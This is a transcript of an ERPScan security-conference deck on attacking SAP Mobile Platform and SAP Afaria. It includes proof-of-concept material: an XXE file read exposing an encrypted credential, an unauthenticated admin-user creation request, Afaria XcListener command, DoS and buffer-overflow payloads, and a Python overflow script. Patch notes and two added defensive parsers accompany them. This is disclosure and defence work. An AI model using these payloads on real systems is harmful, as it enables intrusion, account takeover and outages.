Attacking SAP Mobile. Dmitry Chastukhin, ERPScan. 53 slides.

Transcript
Page 1: Attacking SAP Mobile

Invest in security to secure investments

Attacking SAP Mobile

Dmitry Chastukhin. ERPScan

Page 2: Attacking SAP Mobile

About ERPScan

• The only 360-degree SAP Security solution: ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team: 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)

Page 3: Attacking SAP Mobile

SAP Mobile Platform

Page 4: Attacking SAP Mobile

What is it?

Page 5: Attacking SAP Mobile

SMP architecture

Page 6: Attacking SAP Mobile

Supported platforms

Diagram labels: Objective-C, .NET

Page 7: Attacking SAP Mobile

SMP protocols

Protocol           SUP 2.1.3   SUP 2.2   SMP 2.3   SMP 3.0
SMP Messaging          x           x         x         x
SMP Replication        x           x         x         x
HTTP REST API                      x         x         x
SAP Agentry                                  x         x

Page 8: Attacking SAP Mobile

SMP services

• SAP Control Center
• SAP SQL Anywhere services
• SAP Mobile Server

Page 9: Attacking SAP Mobile

SAP Control Center (Portal)

• Working process: sccservice.exe
• Open ports:
  – 2100 (Messaging service)
  – 8282/8283 (Portal)
  – 9999 (RMI)

Page 10: Attacking SAP Mobile

SMP services

• SAP Control Center
• SAP SQL Anywhere services
• SAP Mobile Server

Page 11: Attacking SAP Mobile

SQL Anywhere

Page 12: Attacking SAP Mobile

SMP services

• SAP Control Center
• SAP SQL Anywhere services
• SAP Mobile Server

Page 13: Attacking SAP Mobile

SAP Mobile Server services

• MobiLink
• AdminWebServices
• MlsrvWrapper
• InfoboxMultiplexer
• OBMO
• JMSBridge

Page 14: Attacking SAP Mobile

SAP Mobile Server (MobiLink)

Page 15: Attacking SAP Mobile

AdminWebServices

• Uses Cassini Web Server 1.0
• Listens on the local port 5100

Page 16: Attacking SAP Mobile

SAP Mobile Platform vulnerabilities

Page 17: Attacking SAP Mobile

Decrypting the SAP Mobile Platform GIOP protocol

Page 18: Attacking SAP Mobile

Decrypting the SAP Mobile Platform GIOP protocol

• GIOP (General Inter-ORB Protocol) is the abstract protocol by which object request brokers (ORBs) communicate
• Uses mlsrv16.exe (MobiLink), port 2000

Page 19: Attacking SAP Mobile

Decrypting the SAP Mobile Platform GIOP protocol

Page 20: Attacking SAP Mobile

XXE in the SAP Mobile Platform portal page…

• Portal URL: https://IP_ADDR:8283/scc
• web.xml & services-config.xml

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\web.xml

    <servlet-mapping>
      <servlet-name>MessageBrokerServlet</servlet-name>
      <url-pattern>/messagebroker/*</url-pattern>
    </servlet-mapping>

Page 21: Attacking SAP Mobile

…XXE…

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\flex\services-config.xml

    <channel-definition id="scc-http"
                        class="mx.messaging.channels.HTTPChannel">
      <endpoint url="http://{server.name}:{server.port}/scc/messagebroker/http"
                class="flex.messaging.endpoints.HTTPEndpoint" />
    </channel-definition>

1. /scc/messagebroker/amfpolling
2. /scc/messagebroker/amfsecurepolling
3. /scc/messagebroker/http
4. /scc/messagebroker/httpsecure
5. /scc/messagebroker/amflongpolling

Page 22: Attacking SAP Mobile

…XXE

Page 23: Attacking SAP Mobile

Read file with XXE

C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\sup.properties

sup.imo.upa = 457ba103a46559486a81350d552a9e47fb085927eb6df0ccc79231bc3d

Page 24: Attacking SAP Mobile

Decrypt sup.imo.upa

Page 25: Attacking SAP Mobile

Prevention

• Install SAP Security Note 2125358: SAP Mobile Platform XXE vulnerability
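A defender-side guard for the kind of servlet input the XXE slides describe, added here as an example and not code from the deck, SAP or ERPScan: it parses a request body with Python's stdlib expat parser and rejects any DOCTYPE or entity declaration before the document reaches application logic, which is the condition an XXE attempt depends on. The AMFX-style sample bodies are constructed for the example.

```python
from xml.parsers import expat


class UnsafeXml(ValueError):
    """Raised when a document carries a DTD, which is where external entities are declared."""


def parse_without_dtd(body):
    """Parse an XML request body, refusing any DOCTYPE or entity declaration.

    Returns the list of (tag, attributes) pairs in document order."""
    parser = expat.ParserCreate()
    seen = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXml(f"DOCTYPE {name!r} declared (system id {sysid!r})")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXml(f"entity {name!r} declared")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    # Never expand parameter entities, even if a DTD somehow got this far.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartElementHandler = lambda tag, attrs: seen.append((tag, dict(attrs)))
    parser.Parse(body, True)   # exceptions raised in handlers propagate out of Parse()
    return seen


def screen_request(body):
    """Return (accepted, detail) for one request body, as a gateway check in front of
    the message broker endpoints would."""
    try:
        elements = parse_without_dtd(body)
    except UnsafeXml as exc:
        return False, str(exc)
    except expat.ExpatError as exc:
        return False, f"malformed XML: {exc}"
    return True, f"{len(elements)} elements, root {elements[0][0]!r}"


# Constructed samples in the AMFX shape a Flex HTTPChannel endpoint accepts; the second
# one declares a DTD with an external entity, the shape every XXE attempt must take.
BENIGN_BODY = '<amfx ver="3"><body><object><string>ping</string></object></body></amfx>'
XXE_BODY = ('<!DOCTYPE amfx [<!ENTITY ext SYSTEM "file:///C:/placeholder/path">]>'
            '<amfx ver="3"><body><string>&ext;</string></body></amfx>')
```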

Page 26: Attacking SAP Mobile

SAP Mobile Platform: unauthenticated access to other servlets

• Architecture and program vulnerabilities in SAP's J2EE engine (BlackHat USA 2011)
• web.xml files revealed hidden methods to:
  – Read and generate logs
  – Deploy and install JAR packages

Page 27: Attacking SAP Mobile

AdminWebService

    POST /MobileOffice/Admin.asmx/AddAdminUser HTTP/1.1
    Host: 127.0.0.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: length

    strUserName=Admin2&strActivationCode=123QWEasd&iExpirationHours=100

Page 28: Attacking SAP Mobile

SAP SQL Anywhere BoF/Code Execution

• CVE-2008-0912: The MobiLink server is affected by a heap overflow which happens during the handling of strings like username, version, and remote ID (all pre-auth) which are longer than 128 bytes
• CVE-2014-9264: Stack-based buffer overflow in the .NET Data Provider in SAP SQL Anywhere allows remote attackers to execute arbitrary code via a crafted column alias

Page 29: Attacking SAP Mobile

First PSH request

Page 30: Attacking SAP Mobile

First PSH request

Page 31: Attacking SAP Mobile

SQL Anywhere DoS

Page 32: Attacking SAP Mobile

Prevention

• Install SAP Security Note 2108161: Denial of service in SAP SQL Anywhere

Page 33: Attacking SAP Mobile

SAP EMR Unwired SQL injection

• CVE-2013-7096 (CVSS 7.5)
• AndroidManifest.xml:

    <provider
        android:name=".providers.ModiDataDbProvider"
        android:authorities="com.sap.mobi.docsprovider" />

1. content://com.sap.mobi.docsprovider/documents/offline_cat
2. content://com.sap.mobi.docsprovider/documents/offline/
3. content://com.sap.mobi.docsprovider/documents/sample
4. content://com.sap.mobi.docsprovider/documents/online
5. content://com.sap.mobi.docsprovider/documents/offline_auth
6. content://com.sap.mobi.docsprovider/documents/offline
7. content://com.sap.mobi.docsprovider/documents/online_auth
8. content://com.sap.mobi.docsprovider/documents/sample/
9. content://com.sap.mobi.docsprovider/documents/online_cat

Page 34: Attacking SAP Mobile

Prevention

• Install SAP Security Note 1864518: Security Improvements for MOB-APP-EMR-AND

Page 35: Attacking SAP Mobile

SAP Afaria

Page 36: Attacking SAP Mobile

SAP Afaria

• MDM solution
  – Version 7.0 SP5: Released August 2014 (as SAP Afaria SP5)
  – Version 7.0 SP4: Released December 2013 (as SAP Afaria SP4)
  – Version 7.0 SP2: Released December 2012 (as SAP Afaria SP2)
  – Version 7.0: Released April 2012 (as SAP Afaria)
  – Version 6.6: Released September 2010
  – Version 6.5: Released November 2009
  – Version 6.0: Released December 2008
  – Version 5.0: Released November 2003
  – Version 4.0: Released June 2000 (as Afaria)
  – Version 3.5: Released May 2000 (as Afaria for Handhelds)
  – Version 3.0: Released October 1999
  – Version 2.0: Released February 1999 (as CONNECT:Manage)
  – Version 1.2: Released October 1997 (as RemoteWare Express)
  – Version 1.0: Released February 1997 (as SessionXpress)

Page 37: Attacking SAP Mobile

How it works

• Provide and enroll devices in management
• Define device settings
• Secure devices and data
• Collect inventory
• Distribute software
• Collect device activity data for managing expenses

Page 38: Attacking SAP Mobile

Enrollment policy

Page 39: Attacking SAP Mobile

Configuration policy

Page 40: Attacking SAP Mobile

Application policy

Page 41: Attacking SAP Mobile

Device information

Page 42: Attacking SAP Mobile

Device information

Page 43: Attacking SAP Mobile

Device information

Page 44: Attacking SAP Mobile

Communication

Page 45: Attacking SAP Mobile

SAP Afaria vulnerabilities

Page 46: Attacking SAP Mobile

Good news

Page 47: Attacking SAP Mobile

Good news

Page 48: Attacking SAP Mobile

Missing authorization

• Command value: Run Channel or Test
• The XML request must start with 4 spaces
• PoC:

    <AfariaNotify version="1.0.0">
      <Message type="Command" value="Run Channel">
        <Client name="AFARIA70PT">
          <Client name="LOCALHOST" GUID="59146189-1f92-46d5-85aa-6293631d5d2e">
            <Transmitter address="172.16.2.67:4444\asd">
              <Channel address="\\172.16.2.67:4444\asd" name="\\172.16.2.67:4444\df"></Channel>
            </Transmitter>
          </Client>
        </Message>
    </AfariaNotify>

Page 49: Attacking SAP Mobile

Prevention

• Install SAP Security Note 2134905: Missing authorization check in XcListener

Page 50: Attacking SAP Mobile

XcListener DoS

    <AfariaNotify version="1.0.0">
      <Message type="Command" value="Run Channel">
        <Client name="LOCALHOST">
          <Client name="LOCALHOST" GUID="59146189-1f92-46d5-85aa-6293631d5d2e">
            <Transmitter address="172.16.2.67:4444\">
              <Channel address="\\172.16.2.67:4444\asd" name="\\172.16.2.67:4444\(A*1491)">
              </Channel>
            </Transmitter>
          </Client>
        </Message>
    </AfariaNotify>(A*3678)

Page 51: Attacking SAP Mobile

XcListener BoF

• PoC:

    import socket
    HOST = 'hostname'
    PORT = 3005
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    poc = 'A'*4098
    s.send(poc)
    data = s.recv(10000)
    s.close()
    print 'Received', (data)

Page 52: Attacking SAP Mobile

Prevention

• Install SAP Security Note 2132584: Buffer overflow in SAP Afaria 7 XcListener
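A detection-side counterpart to the three XcListener slides above (missing authorization, DoS, BoF), added here as an example and not part of the original deck or of SAP's or ERPScan's code: it inspects one AfariaNotify request the way a monitoring sensor in front of port 3005 might, flagging the traits those PoCs share. The trusted-host allowlist, the length threshold and the two sample requests are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET

ROOT_CLOSE = "</AfariaNotify>"
ALLOWED_COMMANDS = {"Run Channel", "Test"}   # the Command values the slides name
TRUSTED_HOSTS = {"172.16.2.67"}              # constructed allowlist of Afaria transmitters
MAX_ATTR_LEN = 512                           # constructed threshold, well under the ~1.5 KB crash size
HOST_RE = re.compile(r"^\\*([0-9A-Za-z.\-]+)(?::\d+)?(?:\\|$)")  # UNC path or host:port form


def inspect_afaria_notify(raw, trusted_hosts=TRUSTED_HOSTS):
    """Return a list of findings for one XcListener request; an empty list means nothing suspicious."""
    findings = []
    if not raw.startswith("    "):
        findings.append("request lacks the 4-space prefix XcListener expects")
    body = raw.lstrip()
    end = body.rfind(ROOT_CLOSE)
    if end == -1:
        return findings + ["no AfariaNotify root element"]
    trailer = body[end + len(ROOT_CLOSE):].strip()
    if trailer:  # the DoS PoC appends thousands of bytes after the root element
        findings.append(f"{len(trailer)} bytes of trailing data after the root element")
    try:
        root = ET.fromstring(body[:end + len(ROOT_CLOSE)])
    except ET.ParseError as exc:
        return findings + [f"malformed XML: {exc}"]
    for msg in root.iter("Message"):
        if msg.get("type") == "Command" and msg.get("value") not in ALLOWED_COMMANDS:
            findings.append(f"unexpected command value {msg.get('value')!r}")
    for elem in root.iter():
        for attr, value in elem.attrib.items():
            if len(value) > MAX_ATTR_LEN:
                findings.append(f"oversized {elem.tag}/{attr} attribute ({len(value)} chars)")
            if elem.tag in ("Transmitter", "Channel") and attr in ("address", "name"):
                m = HOST_RE.match(value)
                host = m.group(1) if m else value
                if host not in trusted_hosts:  # Run Channel against a host the server never configured
                    findings.append(f"{elem.tag}/{attr} points at untrusted host {host[:32]!r}")
    return findings


# Constructed samples: a well-formed notification from a trusted transmitter, and one that
# combines the traits of the slides' PoCs (no prefix, oversized channel name, trailing bytes).
BENIGN_REQUEST = ('    <AfariaNotify version="1.0.0"><Message type="Command" value="Test">'
                  '<Client name="LOCALHOST" GUID="00000000-0000-0000-0000-000000000000">'
                  '<Transmitter address="172.16.2.67:4444\\asd"></Transmitter></Client></Message></AfariaNotify>')
SUSPECT_REQUEST = ('<AfariaNotify version="1.0.0"><Message type="Command" value="Run Channel">'
                   '<Client name="LOCALHOST" GUID="00000000-0000-0000-0000-000000000000">'
                   '<Transmitter address="\\\\10.0.0.5:4444\\x"><Channel address="\\\\10.0.0.5:4444\\x" '
                   'name="\\\\10.0.0.5:4444\\' + "A" * 1491 + '"></Channel></Transmitter>'
                   '</Client></Message></AfariaNotify>' + "A" * 3678)
```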

Page 53: Attacking SAP Mobile

Each SAP landscape is unique and we pay close attention to the requirements of our customers and prospects. ERPScan development team constantly addresses these specific needs and is actively involved in product advancement. If you wish to know whether our scanner addresses a particular aspect, or simply have a feature wish list, please e-mail us. We will be glad to consider your suggestions for the future releases or monthly updates.

About

USA HQ: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA 94301

EU HQ: Luna ArenA, 238 Herikerbergweg, 1101 CM Amsterdam

www.erpscan.com    [email protected]